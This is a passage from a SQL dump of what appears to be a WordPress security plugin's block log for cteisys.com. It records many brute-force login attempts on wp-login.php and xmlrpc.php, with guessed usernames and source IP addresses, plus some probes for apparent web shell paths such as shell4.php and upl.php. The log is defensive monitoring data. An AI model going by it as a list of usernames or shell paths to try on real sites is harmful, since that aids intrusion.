','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1663876807.4765,7,'xUd1vtqYVWK0ykBzmhNOw6u7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.192.91',858177627,'newd',0,1663878183.9621,7,'diFQjzSE2OJLDAfPlwXstgGu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1663878214.8410,7,'gPweJV0nSAjimzFaIGZRELWl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.127.239.132',3162500996,'newd',0,1663878216.4579,7,'LnD4XuOyZrijRm0bHl9tY7JA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.127.239.132',3162500996,'editor',0,1663878218.3175,51,'QVM1qwKLX6tH87SYPJlOua4U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('181.174.125.214',3048111574,'admin',0,1663879576.4186,51,'rnNyW0OD3hoZ4faBFuCpxvGS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.65.234.0',574745088,'admin',0,1663879610.4755,51,'oEMrOc4TApYB05gV2HI7wzmk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.222.152.219',1138661595,'admin',0,1663880342.6570,152,'sUDVCcxd8FYlN64wShekpZEH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'admin',0,1663880824.5456,152,'N1Pn3MOQSZHY5hsqKTEpJIR6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.220.143',861658255,'admin',0,1663881007.7029,51,'7p8ifx9udGtJSVaQFEZh1sM4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.114.235.167',1567812519,'newd',0,1663881337.5224,152,'LS78EkFwcy6GZmAXoIuCtJOr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.117.225',2806478305,'admin',0,1663882385.5206,51,'KOBm1axH7Nku6ogVpCSQRqPZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.62.110.145',2990435985,'newd',0,1663882386.6094,152,'79KMqcC6YP4bpSlA81twaJBT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1663882902.8571,152,'Z3xbwkjavhT5cAPUMWGLOD1K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.169.177.64',3232346432,'newd',0,1663883435.6612,152,'A7YkBT8lrKo1ezfgvOEuL3S4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1663883730.6886,55,'UAEH82KsSY04i6kLjQwGurJa','','19|0|0|0|cteisys.com/shell4.php',0,19,0),('57.128.45.42',964701482,'',0,1663883745.6077,55,'NhK9FfW1zP3wXZmBOHTRJi24','','19|0|0|0|cteisys.com/shell4.php',0,19,0),('67.205.62.27',1137524251,'admin',0,1663883792.2925,51,'QzoMHjayEwYIWr5KkZi2V8Ff','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'admin',0,1663883829.8964,51,'TGZhErjCat0Bqw78i6YI5nAz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.209.28',2994786588,'newd',0,1663883997.9572,152,'rkGtJZYwysfTSveVPzq1xdH3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1663885185.8783,152,'ft5YZiwTzcG21pBJqkL9n8ba','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.171.103',3497110375,'admin',0,1663885208.1252,51,'B1ovT6riR4aNq9I5OmLMWkuE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.178',1736628914,'admin',0,1663885250.4760,51,'paEGILDiMqH9AW8xwBhJTntb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.181',3583550133,'joyce',0,1663885274.6511,152,'INP8pfv31SGJcVn5KBtsr9k6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1663885717.6684,152,'QHDPTgM8VEKYfwalv9ky6cZj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.235',3583556587,'joyce',0,1663886159.6792,152,'TkXKJtb4DcuP3IAsHrERZem7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'admin',0,1663886621.8644,51,'BNjXK9Ce0pkWmDhMnLVt4YFO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.110.251',2650107643,'admin',0,1663886664.0176,51,'i1fZtDVcOKAJ83IMNYrhwjxF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.211.177',2487800753,'newd',0,1663886893.1984,152,'dtHMIFqvLVaCQ3r5BmJYigNZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.28.159.208',2501681104,'newd',0,1663887251.7953,7,'e47PrUGdzgDViwWAqQanC30B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('149.28.159.208',2501681104,'antawn',0,1663887253.3020,51,'ZusXCxEpHh7ayQzBvRVnYjdI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1663887521.4173,152,'mfiy6ajBqMwVHtlDZJshG2NW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.244',3583549940,'joyce',0,1663887522.8515,152,'vZ2ztNSil0jJRFnYhdDqafCI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.226.251.11',1742928651,'newd',0,1663887581.2716,7,'AdoX2ne3DViW8lR7ZrtFEuJ5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.226.251.11',1742928651,'admin1',0,1663887582.5282,51,'hIxdweNBTjvc8JVEt94KgsfZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.117.52',2310567220,'admin',0,1663888037.0914,51,'v9SX60BO2juqwTJMm7V5zQnf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.129.222.91',1736564315,'admin',0,1663888080.3368,51,'NucqT4fFkmro6jHvRpyQX7PS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.89.214',3270072790,'newd',0,1663888102.2515,152,'obXhM1SgAV2me43UcNHRrtws','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.100.101',736191589,'newd',0,1663888947.5335,7,'SOvrIhPFl5Akw01TtRH98Kim','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.225.100.101',736191589,'cteisys.com',0,1663888949.1914,51,'njZXs5VWrY6kbEv7HCMK1zlR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.121.90.150',1736006294,'newd',0,1663889280.5629,152,'H890NSfCO2xdcjWMgLwI6lQr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.120.69.121',762856825,'admin',0,1663889456.6521,51,'KMrZ7Si8q4XNvGRhnV629fQ1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.86.247',1152866039,'admin',0,1663889497.0341,51,'Leoh1VmaB7y5lwrgi84UbQFp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.244.53',2487809077,'newd',0,1663889892.5748,152,'IkaQHiO5dVm6g093pnRwFqsE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.142.80.20',143544340,'newd',0,1663890577.3858,152,'Kj43zGWgOAkFYLPtvHcxubUm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.134',3103917190,'admin',0,1663890881.6664,51,'2Al0zZuwiQKS8O1o5sdeINjg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.157.181',1266130357,'admin',0,1663890924.3652,51,'7lRn6BuDkWvtY1bCqrgPzVf8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.97.173.182',3512839606,'newd',0,1663891133.4681,152,'ig06HPUIeVMcjXzSTChEqDtQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'Joyce',0,1663891463.5675,51,'MNv4mxcgwLoA93XOBEWjaTGk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.51.74',3328324426,'Joyce',0,1663891476.1128,51,'2BZfAdRS30oU4WHgbLYqwGFt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('135.181.60.103',2276801639,'newd',0,1663891573.7833,7,'CFYlaw2BJAZyTI4U7Esci3tS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('135.181.60.103',2276801639,'support',0,1663891575.3913,51,'tL0NgqPGR6oHrXIfknQKd9lh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('8.210.174.93',148024925,'newd',0,1663891743.7478,152,'A2LqmgPnzUH8xGRv50MscwN7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.217.15.207',2430144463,'newd',0,1663892356.0388,7,'mpRExgvCSTj0PB1hGVUdZzQM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.8.26.65',1728584257,'newd',0,1663892356.7269,152,'vcFQUKe95gYxjyX6kP17LzDT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1663892912.7339,51,'0DI9aQS53kURbVAEqCoZjchG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1663892949.0796,152,'hjBmx8pbO5lQ9DJCPeGqYtIH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.121.90.150',1736006294,'newd',0,1663893579.1709,152,'EyDsz7MhYFfOlo9INTAa0Hxn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1663893739.2995,7,'TpS7yKXcHal54fMCV8ZQ13nm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.126.223.177',2424233905,'newd',0,1663893780.1344,7,'5WLyCEoYgVU348rBRNPuhQeK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.121.90.150',1736006294,'newd',0,1663894183.8276,152,'8XsUqDdZagt0nWVIc6xvOLi3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.7.8.169',1728514217,'newd',0,1663894731.0675,7,'uTy17BIxCkcjib9a8YzpPDOV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.7.8.169',1728514217,'marine',0,1663894733.0062,51,'awzj1IN9bYvSpglDOUrnT5hW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1663894787.0301,152,'jiC7ZyfVJso1lBQvFmLhKYWc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1663895214.0373,7,'dp71WgLqo3iMwzCJt6yjebFI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.188.207.230',3351039974,'newd',0,1663895414.5551,152,'0wOVa2SqRnloQLXCFescbtdH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1663896607.2051,7,'4muAx2HfZUaDSgwYNtiM58VI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1663896641.6169,7,'Ync8wjHkEugVqlf7h1QMUS26','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.252.138.226',1509722850,'newd',0,1663896642.5614,152,'cfge7FZAWdNGBlh2yE8OTwsR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1663897279.2075,152,'ADO0WYGnoNTPU5RkQMcth8d9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.123.164.157',343647389,'',0,1663897301.7884,55,'wTGj8x7RLCSWrsoadqtJANUp','','19|0|0|0|cteisys.com//upl.php',0,19,0),('185.2.4.134',3103917190,'newd',0,1663898017.9691,7,'8B3tISCgmsAEXzLFk9vcU0lD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1663898064.8220,7,'N8YtE7kQ9bO0o46GgaLi5rV3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('136.243.118.43',2297656875,'demo1',0,1663898666.3286,51,'whlJv1rKpyF38DmCOQ7oLekB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1663899171.4235,152,'sRZx06d71JHUSpzBCqamElNh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.101.71.221',342181853,'newd',0,1663899440.6413,7,'dHXV9TK31nSjy0lxJwivL4D8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.54.10',2388473354,'newd',0,1663899479.6080,7,'xZVzKOigCFqelSPuptHbMaJs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1663899829.6249,152,'ngH5IC08hXZSFfcA3RWsTUJm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.171.58',2388503354,'newd',0,1663899936.4716,7,'dt15r6ZIB3iFSG9lkUEjgMAp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.171.58',2388503354,'test123',0,1663899937.8708,51,'fnBO8TrS2e6zEgMZRmtN3sPV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('110.40.133.236',1848149484,'newd',0,1663900422.9584,152,'avQPWGpAuZUHwsTO3lDd8bmx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.9.147.4',3104412420,'newd',0,1663900517.5805,7,'tV1e0TuM6bw39QmBIXj4lyqK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.9.147.4',3104412420,'domadmin123',0,1663900519.4824,51,'N4LXPgYeSpxzr6Uu2AqnWdf7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.142.156.234',3582893290,'newd',0,1663900760.8590,7,'o0qcesSruvY4TpmNGVfHOnKz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.142.156.234',3582893290,'abc123',0,1663900762.2625,51,'CvRNWMyBcSewgh3HdOxn0LtA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1663900858.7684,7,'X4BGZu8RgsrJ61YAVj3WSneH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1663900899.4382,7,'ImW0ejo9Z1Pg8xhEiTBJOQrn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1663901014.1783,7,'ly5WDnJCo9dsUI7eXt12FckG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('15.235.168.187',267102395,'newd',0,1663901757.4164,7,'J4p59NwLHGVcjraMfWQFu3ok','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.7.8.169',1728514217,'newd',0,1663902006.3225,7,'1hkoLZOS7p2dglIuE8BJY3ja','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.7.8.169',1728514217,'wp-admin',0,1663902008.3194,51,'lDQ946d8TjPiHu7Ufbs13ya0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1663902269.9831,7,'RyxUf4WcA5s6jZuHvIYpBbN3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1663902311.6814,7,'7pe9dIlGfgsNVQkJCRXnmyBH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('61.222.243.149',1038021525,'admin',0,1663902430.9820,51,'jST98Z6gbaIiAqUEQh1rNGvF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('203.112.72.51',3413133363,'admin',0,1663903089.8362,51,'F7BrlRV2ySm4Hg9a36ZchTJ8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.104.28.48',3110607920,'newd',0,1663903668.7438,7,'zmIMklSuF1jh9qgKNep2bLPO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.104.28.48',3110607920,'user',0,1663903670.1183,51,'Vsz6ONJD2ArWiyGRkTwL7pHK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.75.82',1152863058,'newd',0,1663903676.7546,7,'TdcZsh5JvLX8N4oHDF32mlue','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.56',3103917112,'newd',0,1663903714.8188,7,'jfSiJswHDrkzvANd4T1y67VP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.79.125',2813087613,'admin',0,1663903715.8709,51,'FJzHC8LKDWSg4xNQpVtu7o2l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.101.62.7',778386951,'marina',0,1663904230.7421,51,'RULNQOxndEq4pwKH1ZfTFur3','','0|0|0|0|www.cteisys.com/wp-login.php',0,0,0),('103.129.178.69',1736553029,'admin',0,1663904352.0555,51,'qATuWjvx7f3d1isecGYJIUgF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.158.12.83',2090732627,'admin',0,1663904961.2221,51,'mMcIlFqa1yPVGSkUKLnsijW4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.99.201.91',3227765083,'newd',0,1663905118.2893,7,'0IMfFte5GHx7RaVJhY9zBucg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.185.82.92',3233370716,'admin',0,1663905539.6444,51,'7fU9enIL25xkui6qF8SHhw3C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1663906518.7225,7,'zAJqjR5Qp4rG1cdyVEHaXl2O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.242.130',860877442,'admin',0,1663906638.0983,51,'OPNx3Utlv1eSByMcR4J7689m','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.193.197.89',599901529,'admin',0,1663907178.0389,51,'ImxVPbrDMJ51Ff8XiTousklQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('114.132.250.235',1921317611,'admin',0,1663907723.0048,51,'w4h6ESJfZNe3IYVLW7BmR9GX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1663907859.8842,7,'ujAyVfs95PNcFw7aDz4dBp0x','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1663907899.3921,7,'ejp78bIO6ZSGWdwh4R3CA2UQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('172.104.81.115',2892517747,'admin',0,1663908193.2227,51,'Jaqpvt1BeHXjED0QwPN94zf3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.219.142',2671893390,'admin',0,1663908675.9738,51,'lB4byq628Y0rFQetfNunoKwx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('24.41.60.59',405355579,'admin',0,1663909173.9493,51,'JoRP5HeCOxSDFcwrlf3hEvTq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1663909219.3642,7,'orwQh2CESAu7y0XUFOgJWzje','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.117.225',2806478305,'newd',0,1663909260.7897,7,'dlZWzEXRhHT1IstcuP8MfJnb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.51.74',3328324426,'Joyce',0,1663909624.1640,51,'rftwo8Hh5FvbImzjkSqRyTdN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('61.222.243.149',1038021525,'admin',0,1663909629.3808,51,'i5JgFdSAHUBqlPY3b8tKCnw1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.92.159.48',3193741104,'admin',0,1663910154.4130,51,'fXALVqjBZ6cs2xz9ihatGMPO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1663910589.6937,7,'kNueFDbKSAzqZBTrlpO5CEnL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.75.65.218',575357402,'newd',0,1663910633.7018,7,'moB1DHiwkUYfC5dsRKSbF0cn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.38.40.215',3559270615,'admin',0,1663910636.4928,51,'UXT2YqmAr8n5SlkCGKJdaLvV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.36.190',3515688126,'Joyce',0,1663910945.1377,51,'5KOBxlNrgCJd0f3mPcoIkE8i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.179.87.147',1739806611,'admin',0,1663911134.7575,51,'sj16Ooqaylci2MpRz3d9r7HV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('163.172.110.175',2745986735,'admin',0,1663911647.4397,51,'gZvJaACVLY3b6Iih5BDFRqe9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1663911991.4175,7,'AOST0QzdH29y7t1IK8LsNcUY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.126.223.177',2424233905,'newd',0,1663912005.1877,7,'cmjNIX2preiTLHa6qPExtODY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.36',3168018980,'admin',0,1663912177.5658,51,'qGsiOEcRr3YWV9TyUzkefAaF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.187.183',1088666551,'admin',0,1663912698.8212,51,'xLnwicq95TfgA3U1KJhSpeDz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('61.222.243.149',1038021525,'admin',0,1663913224.7336,51,'hCBve38sUQcjVFSIXEObgt72','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1663913357.1938,7,'abslqM4IeZkBwdtCrWSGD235','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.182.150.188',2478216892,'admin',0,1663913733.7844,51,'RVNknLMAcS8j5fb2sm7vPrqW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.238.234',1729883882,'admin',0,1663914285.7159,51,'qczpNkKEmvnVabP1O0rjLgUG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.233.116.44',3119084588,'newd',0,1663914619.5154,7,'SeaNQ5u8RzHKO0mWJLqY92wT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.233.116.44',3119084588,'hwz',0,1663914621.1539,51,'BgQdIMZVUrA4zhyWJGlpNE56','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.111.116.44',795833388,'newd',0,1663914785.6203,7,'gi9ZHeLhIVwDcFM5sNux764Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.30.143',860823183,'admin',0,1663914786.1826,51,'SywEgcnJK4rb1a6FIfWRLYU7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1663914814.3160,7,'Cywfa4keg17bslPNTuUILn9K','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.117.30',2335929630,'admin',0,1663915320.5986,51,'ebxm9FI6MuTWn4GjKSsCRDrz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.40.224.241',3156795633,'admin',0,1663915840.8971,51,'L2RTSw49soylajgi3HKnUXdN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1663916259.6421,7,'QPJtb7U3wKeByuTsVX48ZE6H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.136.77.170',579358122,'newd',0,1663916287.4126,7,'wgHAzQ3oCGj2mcDeUuaVXyYd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.136.77.170',579358122,'simon',0,1663916288.4068,51,'tEQMZCLnzevwioSVcIuq9Kal','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('112.213.89.124',1893030268,'admin',0,1663916364.2404,51,'OZcFD18jpCVAG6H7TmlShRbE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('18.224.85.64',316691776,'admin',0,1663916948.1189,51,'Zxmcne39yaI72qzbLMRDYVNk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.139.178.177',2475406001,'admin',0,1663917474.8635,51,'3DxAzJ86ewg54OB91WESaCNf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1663917652.0418,7,'Vu3XgS9tfmKaTGkeEUqhBlHc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.182.195.110',3518415726,'newd',0,1663917676.0957,7,'n5rq6mLf2teHY7goZCualIJS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.35.205.6',2703478022,'admin',0,1663918007.8049,51,'MroKhgbDYLVzdtTI8fA52eR9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('88.135.37.49',1485251889,'admin',0,1663918560.4405,51,'xVi8tIXmQNRLYo47CPEMvp2Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1663919082.0843,7,'h4VuNsXQ1ezCfHZaOn23BdPI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1663919109.5638,7,'862OIqwS0yXUQFCDV3m1zHRi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('203.112.72.51',3413133363,'admin',0,1663919115.5333,51,'aBOWZIbqe47gUpdGPl32VKwS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.234.6',3483036166,'admin',0,1663919657.5890,51,'wMuZAip8bhv3n7skfQOCWGlj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.244.239.41',3488935721,'admin',0,1663920216.7922,51,'r94gpVYqswFoJvWMiHNLjKO0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.96.74.105',794839657,'newd',0,1663920505.2489,7,'y8dhMLRVEqNYj40ZWADogmSb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.105.73.13',795429133,'newd',0,1663920537.7427,7,'5xF6kQhKrGcjtgHoJTVqDLCu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.207.36.58',919544890,'',0,1663920970.8575,55,'qzNmbnPp4dUjYfsTyMr7koe8','','19|0|0|0|cteisys.com/wp-admin/maint/update.php',0,19,0),('54.207.36.58',919544890,'',0,1663921027.2947,55,'9Nq5Mljvr7JxSKZC1WPGDyEp','','19|0|0|0|cteisys.com/wp-content/plugins/wpsml-sys.php',0,19,0),('34.68.97.70',574906694,'admin',0,1663921293.8139,51,'qZs8hRAeLJ6wK2WXdDgp157c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.97.172.18',2707532818,'newd',0,1663921722.4003,7,'WuEOBLd1Ixm2TFHs9zVNDS75','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.97.172.18',2707532818,'justin',0,1663921723.8490,51,'y1uG2tzIC7XnNPx6hUiVjSJr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.197.144.236',2328203500,'admin',0,1663921856.6741,51,'FpOPcZHy5me0BjaNJYs1Mlnu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1663921914.2718,7,'QwLVGlarvhyYnSK7qJR5bzgs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1663921956.0808,7,'Z4U6caKBAP38tInyLsCFqH1h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.105.232',866085352,'admin',0,1663922433.9373,51,'GrR0QEI9zAUwSMh8cD7TuYty','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.219',3091980251,'joyce',0,1663922529.6834,152,'Si31Kxv8qjtoNcUAYMBT0kpe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'admin',0,1663923015.4233,51,'WU1LRvHz46CQlhpYVIBxA7a2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.54.10',2388473354,'newd',0,1663923343.1161,7,'0mnXZTHtdQUIEwaL1FW6vkz9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.76.51',867322931,'newd',0,1663923385.1709,7,'oCVjDnZWmRJ953bw1S8LQuix','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.18.75',1386549835,'admin',0,1663923566.0958,51,'vMsDP0TXoVR1dZ7LqFkieNW6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.70.98.118',2084987510,'admin',0,1663924176.8598,51,'l4NgPbKAkeB1Qsniq9d7yLHD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.158.12.83',2090732627,'admin',0,1663924739.4565,51,'VXyk3z8L7rT14oEhg5iRubtY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1663924775.9411,7,'U6KhcxNOaeGrVHdyJ1YkInXl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1663924818.8792,7,'tFb85fQJeiaknP3uDsYUARLz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.168.125.241',3098050033,'admin',0,1663925240.2543,51,'G6irLZov97S5n2tDkWJ4HEhU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.93.182.171',3109926571,'joyce',0,1663925764.9413,152,'d2G4PwfZBlUp3LNyJAOKvb1o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1663925795.4188,51,'5Enp4FZVecKSIBaGxbWdHjk1','','0|0|0|0|cteisys.com/